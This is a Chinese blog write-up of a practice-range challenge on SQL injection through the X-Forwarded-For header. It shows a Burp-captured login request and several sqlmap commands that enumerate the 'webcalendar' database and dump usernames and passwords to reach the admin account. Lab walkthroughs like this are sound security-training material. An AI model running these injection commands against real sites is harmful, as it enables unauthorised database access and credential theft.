360众测靶场题库之16- X-Forwarded-For注入漏洞

文章讲述了作者在靶场环境中发现网站可能记录IP并利用SQL注入进行攻击的过程,通过逐步操作,包括使用Burp抓包,SQLmap进行数据库和表名、列名的探测,最终获取到admin用户的权限。
摘要由CSDN通过智能技术生成

首先打开靶场环境,是一个POST提交登陆的界面

随便输入用户名和密码试试,结果js给我们弹出一串乱码

   咱也看不懂,看到了中间的IP地址,怀疑是我们自己的IP地址,去ip138.com一看,果然是。

说明网站可能记录了我们的ip信息,与数据库交互,此时我怀疑这个就是数据库注入的点。

于是,我先用burp抓取了一个POST提交的数据包

  这里没有X-Forwarded-For这一项,于是我将这个数据包复制到kali中,加入了X-Forwarded-For并把它设置为注入点

  将文件保存为1.txt,用sqlmap尝试注入

sqlmap -r "/root/1.txt" --current-db --batch --threads 10  

大功告成,获得了数据库名字为'webcalendar'.

接下来顺水推舟,一层层注入,获得表名,列名

sqlmap -r "/root/1.txt" -D webcalendar --tables --batch --threads 10  

先注入user表尝试

sqlmap -r "/root/1.txt" -D webcalendar -T user --columns --batch --threads 10

sqlmap -r "/root/1.txt" -D webcalendar -T user -C id,username,password --dump --batch --threads 10

  此时,发现一个admin的用户,我们尝试用他登陆后台,直接登陆成功,获得了key。

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值